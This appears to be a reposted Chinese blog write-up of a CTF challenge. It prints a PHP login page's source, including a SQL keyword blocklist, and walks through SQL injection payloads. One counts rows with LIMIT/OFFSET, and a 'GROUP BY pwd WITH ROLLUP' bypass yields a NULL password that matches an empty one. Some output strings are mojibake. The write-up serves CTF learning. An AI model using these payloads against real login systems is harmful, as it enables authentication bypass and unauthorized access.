web安全
来源:互联网 发布:手机损坏检测软件 编辑:程序博客网 时间:2024/06/07 14:13
CTF实验吧 因缺思汀的绕过
题目
打开链接
查看源码,发现source.txt文件
打开链接
将代码注释,更易大家明白
<?phperror_reporting(0); //关闭错误报告if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '<form action="" method="post">'."<br/>"; echo '<input name="uname" type="text"/>'."<br/>"; echo '<input name="pwd" type="text"/>'."<br/>"; echo '<input type="submit" />'."<br/>"; echo '</form>'."<br/>"; echo '<!--source: source.txt-->'."<br/>"; die;}function AttackFilter($StrKey,$StrValue,$ArrReq){ //过滤字符函数 if (is_array($StrValue)){ //检测变量是否是数组 $StrValue=implode($StrValue); //返回由数组组成的字符串 } if (preg_match("/".$ArrReq."/is",$StrValue)==1){ //i修正符不区分大小写,s圆点.匹配换行符 print "姘村彲杞借垷锛屼害鍙禌鑹囷紒"; //匹配成功一次输出XXXX exit(); //正常退出 }}$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)"; //择一匹配(被过滤的字符)foreach($_POST as $key=>$value){ //遍历数组 AttackFilter($key,$value,$filter);}$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX"); //接数据库if (!$con){ //检测连接 die('Could not connect: ' . mysql_error()); }$db="XXXXXX";mysql_select_db($db, $con); //更改连接默认的数据库$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";$query = mysql_query($sql); //向mysql发送连接查询命令if (mysql_num_rows($query) == 1) { //返回结果集中行的数量 $key = mysql_fetch_array($query); //取结果集中一行做数组 if($key['pwd'] == $_POST['pwd']) { print "CTF{XXXXXX}"; }else{ print "浜﹀彲璧涜墖锛�"; }}else{ print "涓€棰楄禌鑹囷紒";}mysql_close($con); 关闭数据库?>
通过源代码分析可知,做到以下三点就能得到Flag
1.注入查询的的不能含有$filter中的字符
2.查询结果返回一行
3.此行中的pwd=$_POST[‘pwd’]
使用以下代码可知道有几条数据
1' or 1 limit 1 offset 0-- -
1' or 1 limit 1 offset 1-- -
- 返回“浜﹀彲璧涜墖锛�”
1' or 1 limit 1 offset 2-- -
返回”涓€棰楄禌鑹囷紒”;
说明有两条数据
然后用以下代码可绕过第3点
1' or 1 group by pwd with rollup limit 1 offset 2-- -
以下代码有助理解
图片截图:http://blog.csdn.net/jiangnan2014/article/details/17229713
阅读全文
0 0
- web安全
- web安全
- web安全
- WEB安全
- Web安全
- web安全
- web安全
- Web安全
- WEB安全
- WEB安全
- Web安全
- web安全
- web安全
- web安全
- web 安全
- web安全
- WEB安全
- Web安全
- c++ STL pair 用法详解
- MyBatis多数据源配置实现读写分离
- If语句(if…else 和 if…else if … else if … else)
- Ubuntu安装Tomcat
- 《Redis的发布订阅》 原理详解
- web安全
- 暑假总结(一)
- hdu 1506 Largest Rectangle in a Histogram
- 希尔排序(shell sort)
- If()语句 和 switch()语句 的 比较
- 暑假总结(二)
- smking is not in the sudoers file. This incident will be reported.
- 暑假总结(三)
- poj 3617 Best Cow Line